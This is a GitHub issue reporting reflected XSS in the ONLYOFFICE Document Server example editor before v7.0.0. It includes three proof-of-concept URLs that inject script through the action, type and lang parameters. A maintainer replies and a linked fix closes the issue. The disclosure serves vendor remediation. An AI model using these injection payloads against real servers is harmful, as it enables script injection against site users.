Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Vulnerability Report] XSS vulnerability in ONLYOFFICE Document Server Example before v7.0.0 , allows remote attackers inject arbitrary HTML or JavaScript #252

Closed
Bruce-C1 opened this issue Jan 28, 2022 · 1 comment · Fixed by #253
Assignees
Labels

Comments

@Bruce-C1
Copy link

Vulnerability Summary

XSS vulnerability in ONLYOFFICE Document Server Example before v7.0.0 , allows remote attackers inject arbitrary HTML or JavaScript.

Vulnerability Url

http://server.domain/example/editor?action=19319874%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
http://server.domain/example/editor?fileName=new.docx&type=19874%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
http://server.domain/example/editor?lang=11111%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

Vulnerability Description

The XSS vulnerability is in several parameters of the path ‘/example/editor’ in ONLYOFFICE Document Server before v7.0.0.

Test Server Version: 7.0.0 Build:132

##Steps To Reproduce
Vulnerability param: action
Vulnerability URL:
http://server.domain/example/editor?action=19319874%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
image
image

Vulnerability param: type
Vulnerability URL:
http://server.domainexample/editor?fileName=new.docx&type=19874%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
image
image

Vulnerability param: lang
Vulnerability URL:
http://server.domain/example/editor?lang=11111%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
image
image

Vulnerability Solution

Close the test example in Document Server

@LinneyS LinneyS transferred this issue from ONLYOFFICE/DocumentServer Jan 28, 2022
@LinneyS LinneyS added the bug label Jan 28, 2022
@ViktorD58
Copy link

In this scenario, the example is used to exploit this vulnerability, but it is a code example of a Document Management System that is used for testing purposes only and is not used in a production environment.

Document Server's example is disabled by default and is not accessible without enabling it first.

There is no such vulnerability present in a fully-fledged and integrated Document Server.

@LinneyS LinneyS linked a pull request Feb 6, 2022 that will close this issue
@LinneyS LinneyS closed this as completed Feb 6, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

Successfully merging a pull request may close this issue.

4 participants